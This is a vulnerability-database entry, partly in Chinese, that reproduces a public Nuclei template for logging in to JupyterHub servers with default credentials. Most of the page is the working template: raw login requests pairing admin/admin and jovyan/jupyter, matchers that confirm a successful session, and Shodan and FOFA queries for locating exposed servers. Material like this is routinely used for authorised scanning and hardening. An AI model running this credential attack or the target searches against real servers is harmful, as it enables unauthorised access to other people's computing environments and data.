jupyterhub-default-login: Jupyterhub - Default Admin Discovery

日期: 2025-08-01 | 影响软件: Jupyterhub | POC: 已公开

漏洞描述

Jupyterhub default admin credentials were discovered. shodan: http.title:"JupyterHub" fofa: title="JupyterHub"

PoC代码[已公开]

id: jupyterhub-default-login

info:
  name: Jupyterhub - Default Admin Discovery
  author: For3stCo1d
  severity: high
  description: Jupyterhub default admin credentials were discovered.
  reference:
    - https://github.com/jupyterhub/jupyterhub
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
    cpe: cpe:2.3:a:jupyter:jupyterhub:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    shodan-query: http.title:"JupyterHub"
    product: jupyterhub
    vendor: jupyter
  tags: jupyterhub,default-login,vuln

http:
  - raw:
      - |
        POST /hub/login?next= HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{user}}&password={{pass}}

    attack: pitchfork
    payloads:
      user:
        - admin
        - jovyan
      pass:
        - admin
        - jupyter

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - contains(tolower(header), 'jupyterhub-session-id=')
          - contains(tolower(header), 'jupyterhub-hub-login=')
        condition: and

      - type: status
        status:
          - 302
# digest: 4a0a0047304502204354244ee9629c4ec66ff2eb9938145935b977cc662ca2a18512068b79261f3a022100d7fb99d1fb7c0c7e9abef16d056819c3cbd0fc752c52cfd6d7249d582247d893:922c64590222798bb761d5b6d8e72950